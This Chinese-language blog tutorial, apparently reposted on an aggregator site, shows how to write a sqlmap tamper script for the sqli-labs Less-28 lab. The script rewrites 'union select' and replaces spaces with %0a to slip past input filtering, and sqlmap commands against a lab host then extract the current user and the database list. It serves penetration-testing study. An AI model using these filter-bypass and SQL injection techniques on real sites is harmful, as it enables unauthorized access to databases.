渗透测试-sqlmap绕过WAF脚本编写

这篇具有很好参考价值的文章主要介绍了渗透测试-sqlmap绕过WAF脚本编写。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

sqlmap绕过WAF脚本编写

前言

一、什么是sqlmap和tamper脚本

Sqlmap一款功能强大集成了多种数据库识别及注入方式,多用于识别和利用Web 应用程序注入漏洞的工具,它的优点在于集成了大量 payload,对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。 我们之前学习时间盲注的时候,可以针对时间盲注类型的漏洞的写个专门的自动化脚本来帮忙我们测试,但是不比这个sqlmap这个集成工具强大。

1.tamper的作用
使用SQLMap提供的tamper脚本,可在一定程度上避开应用程序的敏感字符过滤、绕过WAF规则的阻挡,继而进行渗透攻击。

部分防护系统的缩写:

WAF:Web应用程序防火墙,Web Application Firewall
IPS:入侵防御系统, Intrusion Prevention System
IDS:入侵检测系统,Intrusion Detection System

2.tamper用法
–tamper=TAMPER 利用给定的脚本进行篡改注入数据。其用法可举例说明:
python sqlmap.py -u “http://…/?uname=admin&pwd=pass123” --level=5 --risk=3 -p “uname” --tamper=xxx.py
表示对指定的url地址,以所设置的level等级、risk等级,并采用选定的tamper篡改脚本对参数“uname”进行检测

二、利用sqlmap脚本进行扫描获取数据库信息

1.编写sqlmap绕过WAF脚本

利用sqli-labs实验室第28关进行实验,进行代码审计可知
渗透测试-sqlmap绕过WAF脚本编写
代码中对各种符号,空格进行了过滤,说明存在WAF,我们可以进行编写sqlmap脚本进行绕过,这里编写一个sqli-labs28.py脚本到sqlmap的tamper目录下
脚本模板如下:

#!/usr/bin/env python

“”"
Copyright © 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file ‘LICENSE’ for copying permission
“”"

from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY

priority = PRIORITY.LOW

def dependencies():
pass

def tamper(payload, **kwargs):
“”"
Bypass sqli-lasbs/Less-28
“”"
if payload:
payload = payload.replace(‘union select’,‘unnion all select’).replace(’ ‘,’%0a’)
return payload

2.通过sqlmap进行获取数据库信息

这里我在window下使用sqlmap,搭建python环境进行运行
首先,进行对目标url进行扫描
python sqlmap.py -u “http://192.168.222.4/sqli-labs/Less-28/?id=1” --flush-session
渗透测试-sqlmap绕过WAF脚本编写
渗透测试-sqlmap绕过WAF脚本编写
扫描结果可知,id参数没有存在注入点,这里我们脚本侥幸扫描试试是否可以绕过过滤点进行注入,获取信息。
输入脚本文件
python sqlmap.py -u “http://192.168.222.4/sqli-labs/Less-28/?id=1” --flush-session --tamper=sqli-labs28
渗透测试-sqlmap绕过WAF脚本编写
渗透测试-sqlmap绕过WAF脚本编写
由测试结果可知,注入成功,接下来我们获取数据信息
python sqlmap.py -u “http://192.168.222.4/sqli-labs/Less-28/?id=1” --tamper=sqli-labs28 --current-user(输出当前用户)
渗透测试-sqlmap绕过WAF脚本编写
由结果可知,获取信息成功,接下来我们获取有哪些数据库
python sqlmap.py -u “http://192.168.222.4/sqli-labs/Less-28/?id=1” --tamper=sqli-labs28 --dbs -v 3(通过payload获取数据库内容)
渗透测试-sqlmap绕过WAF脚本编写
渗透测试-sqlmap绕过WAF脚本编写
渗透测试-sqlmap绕过WAF脚本编写
由以上结果可知,数据库信息获取成功,实验结束。
接下来大家就可以利用sqlmap核心语法获取更多的信息。

总结

本次实验是利用sqlmap编写脚本绕过WAF的一个经典实例,通过代码审计发现存在符号和空格过滤,我们就可以进行编写脚本进行绕过,这样我们就可以通过绕过WAF,获取对方的数据库信息了。文章来源地址https://www.toymoban.com/news/detail-491205.html

到了这里,关于渗透测试-sqlmap绕过WAF脚本编写的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 使用Python编写一个渗透测试探测工具

    本篇将会涉及: 资源探测 一个有用的字典资源 第一个暴力探测器 资源探测 资源探测在渗透测试中还是属于资源的映射和信息的收集阶段。 主要有以下三个类型: 字典攻击 暴力破解 模糊测试 字典攻击,在破解密码或密钥的时候,通过自定义的字典文件,有针对性地尝试字

    2024年01月16日
    浏览(33)
  • mysql waf绕过-WAF Bypass技巧(2)

     数据库waf绕过的一些玩法 WAF Bypass技巧(0)_luozhonghua2000的博客-CSDN博客  WAF绕过-WAF Bypass技巧(1)_luozhonghua2000的博客-CSDN博客  数据库特性 第一篇: Mysql数据库特性 0x01 前言 我们经常利用一些数据库特性来进行WAF绕过。在Mysgl中,比如可以这样       位置一: 参数和union之间的位

    2024年02月08日
    浏览(26)
  • 24 WEB漏洞-文件上传之WAF绕过及安全修复_阿里云盾waf绕过怎么修复

    目录 WAF绕过 上传参数名解析:明确哪些东西能修改? 常见绕过方法: `符号变异-防匹配(’ \\\" ;)` 数据截断-防匹配(%00 ; 换行) 重复数据-防匹配(参数多次) 搜索引擎搜索fuzz web字典 文件上传安全修复方案 WAF绕过 safedog BT(宝塔) XXX云盾 宝塔过滤的比安全狗厉害一些,在真实情况下现

    2024年02月20日
    浏览(34)
  • [渗透测试]—7.1 漏洞利用开发和Shellcode编写

    在本章节中,我们将学习漏洞利用开发和Shellcode编写的基本概念和技巧。我们会尽量详细、通俗易懂地讲解,并提供尽可能多的实例。 漏洞利用开发是渗透测试中的高级技能。当你发现一个软件或系统存在漏洞时,你需要编写一段代码来利用这个漏洞,从而在目标系统上执行

    2024年02月11日
    浏览(38)
  • waf绕过

    硬件Waf: 绿盟、安恒、启明、知道创宇等         需要选择模式         透明模式         反向代理分为反向代理(代理模式)与反向代理(牵引模式)         反向代理又分为两种模式,反向代理(代理模式)与反向代理(牵引模式)         旁路监控 软件Waf: 安

    2024年02月08日
    浏览(26)
  • RCE攻击绕过WAF详解

    今天继续给大家介绍渗透测试相关知识,本文主要内容是RCE攻击绕过WAF详解。 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调:严禁对未授权设备进行渗透测试! 针对RCE类型的攻击,有时WAF会进行拦

    2023年04月27日
    浏览(26)
  • 03-WAF绕过-漏洞利用之注入上传跨站等绕过

    1.绕过cc流量 通过sqlmap对网站进行测试的时候,如果对方有cc流量防护,需要给sqlmap设置一个代理进行注入。 防cc拦截:修改user-agent头+代理(付费代理池) 修改user-agent头: ​ (1)加参数:–random-agent 使用随机user-agent进行测试。sqlmap有一个文件中储存了各种各样的user-age

    2024年02月02日
    浏览(31)
  • 网络安全各类WAF绕过技巧

    即传入一段长数据使waf失效,从而实现绕过waf。某些waf处理POST的数据时,只会检测开头的8K,后面选择全部放过。 例如,当发现某网站存在一个反序列化漏洞时,但是无回显,被waf拦截了 利用脏数据插入5000个x字符,可以成功绕过。 对请求进行并发,攻击请求会被负载均衡

    2024年02月09日
    浏览(29)
  • WAF绕过漏洞利用——漏洞利用之注入上传跨站等绕过

    目录 前言: (一)SQL注入 0x01  sqlmap注入 修改user-agent头: (二)文件上传

    2024年02月12日
    浏览(30)
  • 深入waf绕过 (云盾,宝塔,安全狗)(19)

    简要其他的绕过方法 第一种方式  ip白名单 在waf里面有设置,白名单就是允许通过的,白名单这些东西就不会进行拦截,如果有这个白名单,你还知道对方白名单的ip地址,根据他的IP地址,去伪造自己是白名单的IP地址,waf就不会拦截, 有前提条件第一个知道对方的白名单

    2024年02月13日
    浏览(25)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包